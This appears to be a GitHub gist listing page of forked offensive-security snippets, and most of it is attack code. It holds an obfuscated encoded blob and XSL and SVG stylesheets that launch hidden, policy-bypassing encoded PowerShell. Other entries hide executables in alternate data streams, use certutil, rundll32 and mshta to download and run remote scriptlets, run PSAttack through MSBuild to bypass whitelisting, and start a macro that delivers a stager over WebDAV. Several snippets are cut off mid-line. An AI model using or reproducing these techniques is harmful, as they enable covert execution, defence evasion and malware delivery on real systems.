
Cryptonic cryptonic01

#@~^fwcAAA==7 dUhi dzmDr\(64N+^OvJU^I&nKcju+^Sr# IiUvd dEEnKh3.kC+ssc2a2r7 d7 Pqo+:d 7`]mul"T77,!(+0diPdi~QdiP]Zub]Did~!X{cid~7iP_77,$^tm]Yd7,!oGcid,7d,_7d,$/4zITi7PZ6GZ77Pid,_7d~,1tCDY7d,!a{2dd~7iPQdi~]Z4mDYdd,!Xfbid~diPQ7iP$;4bMTdi~T(ysid~d7~3d7P]^CmID7iP!a+wd7Pi7,_7iP]mtzIY7d,!avyd7~idP37d,$Z_C.Tid,!pv17iP7d,QdiP,^4bDD7iPT6F*id~id,_diP]/CmDDdiPTp+ di~diP_i7~$;CmIDd7~Z({*i7Pid~QidP,/4b.Ti7,!a+&idPid,QdiP,Z4b.DidPZpv~dd,77P3diP,muCMT7d,T(+*77,dd~Qid~$14zDDid,!6Fci7Pid~_id~,;tlMDdiP!o+3diPid~_77,$^tm]Tid~Tovs77,d7P37iP,;CzDTid,T(F 7d,d7~3dd,,m4bDY77PZ(+G7d~7iPQdi~$1t)]Ydd~TX odi~id~3diP$;tm.Tid~!ovo7iPdi~_idP]^4b"Tid~!p2d7Pi7P3d7~]mCC.Yd7PZaFc7iPidP3di~$1tCDYd7~Z6vw7d,dd,Q7d,$1C)DD7iPT(FTdiP77,_d7~]Z4lMDid~Z(F*diPi7P3d7P]Zu)MTdi~!oG&i7~diP3d7P,/_l.Ti7PZ6{idP77,_7d,,;tCMTidPZ(F+diP7d,_77,$m_CIYdd,TavwdiP7d~Qid~$;4bMT77,!({Xid~di~3d7,$1tb"Ti7PZ({!id~7iP_i7P]mtz]DdiPZ6+s77,d7P37d,$/4zDT77,!av87iP7iP3dd,$;4bMT7d,!p{Zdd,7d,_di~,m_l"T7d~TXG*di~diPQ7iP$/4mDDdi~Z(fydiPdiP37d,$^CmDD7iP!Xf!idPi7~_id,$/C)]Yd7PZp wd
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c powERSHElL.ExE -eX ByPASS -nOP -W HiDDeN -Ec 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
<RoOT XMlNS = "gzoprjonlbazvntlokftttscrjabkpkyvgrjzxrandsvlmrhedcywllhtcxxbygqaywgbjgiigrfobxmytqjnuoroufxndunwyimlecdygcjttfswcdegeuwfjdfiqugjdkeqsycjcijowjqadwnozznrszzztbnpmjmfkqwprqllwewitcoaqwhztbjaziypvmosqxctwhradjdy">
<script xmlns = "http://Www.W3.OrG/2000/svG" >
<![CDATA[
new ActiveXObject("wsCRiPT.sheLL").RuN( '"powErsheLL.EXe" POWersHEll.Exe -eX byPASS -NOp -w hIddEN -EC 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
cryptonic01 / Exe_ADS_Methods.txt
Created July 13, 2018 01:10 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Data Streams (ADS)
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
<?XML version="1.0"?>
<scriptlet>
<registration
progid="17807259"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var sBuffer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
<?XML version="1.0"?>
<scriptlet>
<registration
progid="17807259"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var sBuffer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
cryptonic01 / PSA64.cs
Created July 13, 2018 01:30 — forked from NickTyrer/PSA64.cs
PSAttack Using MSBuild Downloader
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight's work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{
cryptonic01 / PSA_MSBUILD64.csproj
Created July 13, 2018 01:30 — forked from NickTyrer/PSA_MSBUILD64.csproj
PSAttack Using MSBuild Bytestream
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith's work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371) -->
<!-- Based on Jared Haight's work (https://github.com/jaredhaight/PSAttack) -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
TaskFactory="CodeTaskFactory"
cryptonic01 / macro_webdav_delivery.vba
Created July 24, 2018 18:25 — forked from Arno0x/macro_webdav_delivery.vba
Office macro using WebDAV mapping to deliver payload
'
' Example of DBC2 msbuild.xml stager delivery through a WebDAV mapping
' The stager file (msbuild.xml) can be generated from the DBC2 controller
'
' NOTE:
' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml)
' but it fails miserably for me, so I have to first map the drive...
Sub Go()
Dim cmd As String, srv As String